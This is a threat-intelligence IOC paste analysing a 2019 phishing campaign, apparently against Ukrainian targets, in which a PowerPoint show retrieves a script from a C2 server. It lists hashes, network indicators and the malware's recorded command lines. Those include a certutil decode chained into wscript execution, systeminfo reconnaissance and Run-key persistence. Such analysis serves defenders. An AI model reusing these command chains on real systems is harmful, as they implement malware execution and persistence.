VRad

#xml_wsh_280319

Mar 29th, 2019
660
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #APT #XML_RELS #WSH #EXE_Less #Recon
  2.  
  3. https://pastebin.com/kiSbFi36
  4.  
  5. attack_vector
  6. --------------
  7. email attach .ZIP > .PPSX > XML_RELS > GET > WSH > %temp%\tmp4E07.tmp > %userprofile%\NTUSR.DAT
  8.  
  9. email_headers
  10. --------------
  11. Received: from o1.31pqt.s2shared.stmpendgrid.net ([167.89.100.227])
  12. Received: by filter0029p3iad2.sendgrid.net
  13. Received: from OTQ2MjY1Mw (host-94-103-82-136.hosted-by-vdsina.ru [94.103.82.136]) by ismtpd0007p1lon1.sendgrid.net
  14. Date: Thu, 28 Mar 2019 12:46:31 +0000 (UTC)
  15. From: socis@socis.kiev.ua
  16. To: user00@victim01
  17. Subject: ПРЕС-РЕЛІЗ ЗА РЕЗУЛЬТАТАМИ СОЦІОЛОГІЧНОГО ДОСЛІДЖЕННЯ «ПРЕЗИДЕНТСЬКІ ВИБОРИ 2019-БЕРЕЗЕНЬ»
  18.  
  19. files
  20. --------------
  21. SHA-256 30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72
  22. File name Prezent_UA_2k_berezen_PRESS.ppsx [Microsoft PowerPoint 2007+]
  23. File size 391.03 KB (400418 bytes)
  24.  
  25. SHA-256 360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f
  26. File name wj5yuxmp.hmf [XML document, ASCII text, with very long lines, with CRLF]
  27. File size 272.7 KB (279242 bytes)
  28.  
  29. SHA-256 09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b
  30. File name tmp4E07.tmp [ASCII text, with very long lines, with no line terminators]
  31. File size 270.93 KB (277430 bytes)
  32.  
  33. SHA-256 85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3
  34. File name NTUSR.DAT [ASCII text, with very long lines, with no line terminators]
  35. File size 203.19 KB (208070 bytes)
  36.  
  37. activity
  38. **************
  39.  
  40. PL_SCR = C2 = 185.176.43.94
  41.  
  42. netwrk
  43. --------------
  44. 185.176.43.94 socis.cf GET /wj5yuxmp.hmf HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;)
  45. 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
  46. 185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
  47. 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
  48. 185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
  49. 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
  50.  
  51. comp
  52. --------------
  53. POWERPNT.EXE 2844 TCP localhost 49232 185.176.43.94 80 ESTABLISHED
  54. wscript.exe 1104 TCP localhost 49224 185.176.43.94 80 ESTABLISHED
  55.  
  56. proc
  57. --------------
  58. C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE /s C:\Users\operator\Desktop\Prezent_UA_2k_berezen_PRESS.ppsx
  59.  
  60. C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  61. C:\Windows\system32\cmd.exe /c certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT && timeout 10 && wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
  62.  
  63. C:\Windows\system32\certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT
  64. C:\Windows\system32\timeout 10
  65.  
  66. C:\Windows\system32\wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
  67. C:\Windows\System32\wscript.exe" //B //E:vbs "C:\Users\operator\NTUSR.DAT
  68. C:\Windows\System32\cmd.exe" /c mode con cp select=65001 | systeminfo > C:\tmp\radB50A0.tmp
  69. C:\Windows\system32\mode.com con cp select=65001
  70. C:\Windows\system32\systeminfo.exe
  71.  
  72. persist
  73. --------------
  74. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 29.03.2019 12:23
  75. (Default) c:\users\operator\ntusr.dat 29.03.2019 12:23
  76. wscript.exe //B //E:vbs "C:\Users\operator\NTUSR.DAT"
  77.  
  78. drop
  79. --------------
  80. %temp%\tmp4E07.tmp
  81. %userprofile%\NTUSR.DAT
  82.  
  83. # # #
  84. https://www.virustotal.com/gui/file/30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72/details
  85. https://www.virustotal.com/gui/file/360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f/details
  86. https://www.virustotal.com/gui/file/09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b/details
  87. https://www.virustotal.com/gui/file/85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3/details
  88. https://urlscan.io/result/83a3366e-12ee-4a6c-a326-a8eb19bc77c7
  89.  
  90. VR
RAW Paste Data